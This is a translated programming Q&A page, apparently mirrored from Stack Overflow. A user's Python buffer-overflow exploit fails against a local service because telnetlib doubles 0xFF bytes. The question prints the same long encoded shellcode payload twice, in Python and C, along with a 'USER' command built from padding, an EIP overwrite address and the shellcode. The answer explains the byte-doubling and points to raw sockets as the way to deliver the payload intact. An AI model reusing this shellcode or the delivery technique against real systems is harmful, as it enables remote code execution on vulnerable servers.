我在python中使用了一些shellcode,但失败了 [英] I was using a little shellcode in my python but failed
问题描述
Python版本是2.7.3。
代码是这样的...
完成的代码是表示(强调我的意思):
向套接字写入一个字符串,将任何IAC字符加倍。。如果连接被阻止,则此字符串可以阻止。如果连接已关闭,则可能引发socket.error。
IAC字符恰好是ASCII 255,即'\xff'
。
如果比较两个转储:python版本的IAC char FF
会加倍,但不能C版本,它使用的是原始套接字,您也可以使用 socket
模块在Python中完成。
Python version is 2.7.3.
Code is like this... The completed code is here
https://gist.github.com/3977494
shellcode = bytearray(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
"\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
"\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
"\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
"\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
"\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
"\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
"\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
"\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
"\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
"\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
"\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
"\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
"\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
"\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
"\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
"\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
"\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
"\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
"\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
"\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
"\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
"\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
"\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
"\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
"\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
"\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"
)
tn = telnetlib.Telnet('127.0.0.1', 11000)
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n'
tn.write(user_string)
pass_string = "PASS 123\n"
tn.write(pass_string)
My friend use the same string in c everything works well. When I check the ollyDbg, I found the command is different, it seems python change the coding type. I don't know... Any help? It's driving me crazy.
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
"\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
"\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
"\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
"\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
"\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
"\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
"\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
"\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
"\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
"\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
"\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
"\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
"\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
"\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
"\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
"\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
"\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
"\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
"\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
"\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
"\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
"\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
"\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
"\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
"\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
"\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";
Oh, I got it almost. 00AEFD70 are so many FF. Why?
I write the same funciton code in c++. Everything works right. Here is the compare.
In another word, what happend to this?
The telnet lib documentation indicates that (emphasis mine):
Write a string to the socket, doubling any IAC characters. This can block if the connection is blocked. May raise socket.error if the connection is closed.
The IAC character happens to be ASCII 255, which is '\xff'
.
If you compare your two dumps: the IAC char FF
is being doubled in the python version, but not in the C version, which is using a raw socket, which you could do in Python too using the socket
module.
这篇关于我在python中使用了一些shellcode,但失败了的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!